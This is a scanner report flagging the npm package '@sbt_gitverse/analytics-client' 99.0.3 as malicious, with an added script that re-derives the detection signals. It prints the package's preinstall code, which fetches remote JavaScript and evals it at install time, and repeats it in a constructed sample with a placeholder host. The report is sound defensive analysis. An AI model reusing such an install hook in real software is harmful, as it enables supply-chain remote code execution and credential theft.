@sbt_gitverse/analytics-client @99.0.3
analytics-client utilities
Maintainers
Risk Dispositions (4 applicable to this version, 0 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason |
|---|---|---|---|---|
| install-script:preinstall | install-scripts | reject | AI | AI (install-scripts): Preinstall fetches and evals remote code while harvesting /etc/passwd — malicious by design, generalizes to all versions of this package. |
| semgrep:etc-passwd-access | semgrep | reject | AI | AI (semgrep): Explicit /etc/passwd access in preinstall script for credential harvesting; this is the core malicious payload. |
| semgrep:eval-usage | semgrep | reject | AI | AI (semgrep): eval() of remotely fetched code in preinstall — arbitrary RCE at install time, definitively malicious for this package. |
| bogus-package | bogus-package | reject | AI | AI (bogus-package): All bogus-package signals confirmed: new publisher with rejected history, inflated semver, no repo, empty entry point — throwaway malware delivery package. |
SAST Findings (8)
[Always reject] Script: node preinstall.js
[Always reject] Matched 6 signal(s), weighted score 8:
- [S_KNOWN_SPAM_PUBLISHER] Maintainer(s) previously flagged as spam: m0ntana.
- [S_NO_REPO_NO_HOME] No repository, homepage, or bugs URL — genuine packages almost always link somewhere.
- [S_NO_KEYWORDS] No keywords declared.
- [S_NO_DEPS] No runtime, dev, peer, or optional dependencies declared.
- [S_TINY_PAYLOAD] Tiny payload: 3 code file(s), 2025 bytes total.
- [S_EMPTY_MAIN] Entry point (index.js) is 21 bytes — effectively empty.
---
_-= Per source details. Do not edit below this line.=-_

## Source: ossf-package-analysis (121ee33ab9f0a4cf48e44c561f81e935b7f29af1b98343471b7684c444d86bfa)

The OpenSSF Package Analysis project identified '@sbt_gitverse/analytics-client' @ 99.0.3 (npm) as malicious. It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
[Always reject] Accessing /etc/passwd or /etc/shadow — credential harvesting on Linux

```js
const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-");

// Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only)   <- flagged line
http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => {
  let body = "";
```

Note that the match here is on the comment text: the visible preinstall script does not open /etc/passwd itself. The read, if it happens, is in poc.js, which is fetched over plain HTTP from a hostname derived from the package name and evaluated (next finding), so the actual payload can differ per install and is not in the published tarball.
[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source.

```js
  let body = "";
  res.on("data", chunk => { body += chunk; });
  res.on("end", () => { try { eval(body); } catch (_) {} }); // jshint ignore:line   <- flagged line
}).on("error", () => {}).on("timeout", function() { this.destroy(); });
```
[Always reject] Accessing /etc/passwd or /etc/shadow — credential harvesting on Linux

```js
const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-");

// Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only)   <- flagged line
http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => {
  let body = "";
```
[Always reject] eval() can execute arbitrary code — common in supply-chain attacks but also used by legitimate parsers and template engines. Verify the input source.

```js
  let body = "";
  res.on("data", chunk => { body += chunk; });
  res.on("end", () => { try { eval(body); } catch (_) {} }); // jshint ignore:line   <- flagged line
}).on("error", () => {}).on("timeout", function() { this.destroy(); });
```
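The script below is an added example, not code from this page or from any of the scanners it cites. It re-derives the bogus-package signals listed in the weighted-score finding above and the fetch-then-eval and /etc/passwd checks behind the two findings just above, over a package's metadata and files, so a reviewer can reproduce the verdict offline. The signal ids follow the report; the weights, the thresholds, the hook-to-file resolution, the sample package.json and the sample preinstall.js (reshaped from the snippet above, with placeholder hostnames) are all constructed for the example.

```javascript
// Added example: re-derive this report's bogus-package and install-script
// signals from package metadata and file contents. Signal ids follow the
// report; weights and thresholds are assumptions, not the scanner's values.
const SIGNAL_WEIGHTS = {
  S_KNOWN_SPAM_PUBLISHER: 3,
  S_NO_REPO_NO_HOME: 1,
  S_NO_KEYWORDS: 1,
  S_NO_DEPS: 1,
  S_TINY_PAYLOAD: 1,
  S_EMPTY_MAIN: 1,
  S_INFLATED_SEMVER: 2,
  S_INSTALL_REMOTE_EVAL: 5,  // an install hook both fetches over the network and eval()s
  S_INSTALL_ETC_PASSWD: 3,   // an install hook mentions /etc/passwd or /etc/shadow
};
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

function byteLength(s) { return Buffer.byteLength(s, "utf8"); }

// pkg: parsed package.json; files: { relativePath: contents }; spammers: Set of flagged maintainer names
function bogusPackageSignals(pkg, files, spammers) {
  const out = [];
  const maintainers = (pkg.maintainers || []).map(m => (typeof m === "string" ? m : m.name));
  if (maintainers.some(m => spammers.has(m))) out.push("S_KNOWN_SPAM_PUBLISHER");
  if (!pkg.repository && !pkg.homepage && !pkg.bugs) out.push("S_NO_REPO_NO_HOME");
  if (!Array.isArray(pkg.keywords) || pkg.keywords.length === 0) out.push("S_NO_KEYWORDS");
  const depFields = ["dependencies", "devDependencies", "peerDependencies", "optionalDependencies"];
  if (depFields.every(f => !pkg[f] || Object.keys(pkg[f]).length === 0)) out.push("S_NO_DEPS");
  const code = Object.entries(files).filter(([p]) => /\.[cm]?js$/.test(p));
  const total = code.reduce((n, [, body]) => n + byteLength(body), 0);
  if (code.length <= 3 && total < 4096) out.push("S_TINY_PAYLOAD");        // assumed thresholds
  const main = files[pkg.main || "index.js"];
  if (main !== undefined && byteLength(main) < 64) out.push("S_EMPTY_MAIN"); // assumed threshold
  const major = parseInt(String(pkg.version || "0").split(".")[0], 10);
  if (major >= 50) out.push("S_INFLATED_SEMVER");                           // assumed threshold
  return out;
}

function installScriptSignals(pkg, files) {
  const out = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (!cmd) continue;
    // "node <file>" is resolved to that file's contents; any other command is inspected as text.
    const m = /^node\s+(\S+)/.exec(cmd.trim());
    const body = m && files[m[1]] !== undefined ? files[m[1]] : cmd;
    const fetches = /\b(?:https?\.(?:get|request)|fetch)\s*\(/.test(body);
    const evals = /\beval\s*\(|new\s+Function\s*\(/.test(body);
    if (fetches && evals) out.push("S_INSTALL_REMOTE_EVAL");
    // Plain text match: like the semgrep finding above, this also fires on a comment,
    // so it proves a mention, not a read. The actual read may live in the fetched code.
    if (/\/etc\/(?:passwd|shadow)\b/.test(body)) out.push("S_INSTALL_ETC_PASSWD");
  }
  return out;
}

function scorePackage(pkg, files, spammers) {
  const signals = [...bogusPackageSignals(pkg, files, spammers), ...installScriptSignals(pkg, files)];
  const score = signals.reduce((n, s) => n + (SIGNAL_WEIGHTS[s] || 0), 0);
  return { signals, score };
}

// Constructed sample shaped like the package in this report; not its real tarball contents.
const SAMPLE_PKG = {
  name: "@sbt_gitverse/analytics-client",
  version: "99.0.3",
  description: "analytics-client utilities",
  main: "index.js",
  scripts: { preinstall: "node preinstall.js" },
  maintainers: [{ name: "m0ntana" }],
};
const SAMPLE_FILES = {
  "index.js": "module.exports = {};\n",
  "preinstall.js": [
    'const http = require("http");',
    'const raw = process.env.npm_package_name || "", scope = "x", BASE = "example.invalid";',
    'const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-");',
    '// Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only)',
    'http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => {',
    '  let body = "";',
    '  res.on("data", chunk => { body += chunk; });',
    '  res.on("end", () => { try { eval(body); } catch (_) {} });',
    '}).on("error", () => {}).on("timeout", function() { this.destroy(); });',
  ].join("\n"),
};
const SAMPLE_SPAMMERS = new Set(["m0ntana"]);  // constructed block list

console.log(scorePackage(SAMPLE_PKG, SAMPLE_FILES, SAMPLE_SPAMMERS));
```

Run it with node; on the constructed sample it reports all nine signals. When pulling a flagged package for manual review, `npm install --ignore-scripts` (or `ignore-scripts=true` in .npmrc) keeps the preinstall hook from running while you read it.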
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 100 (capped from 283). Findings: 7 critical (+280), 1 low (+3).
Published to npm: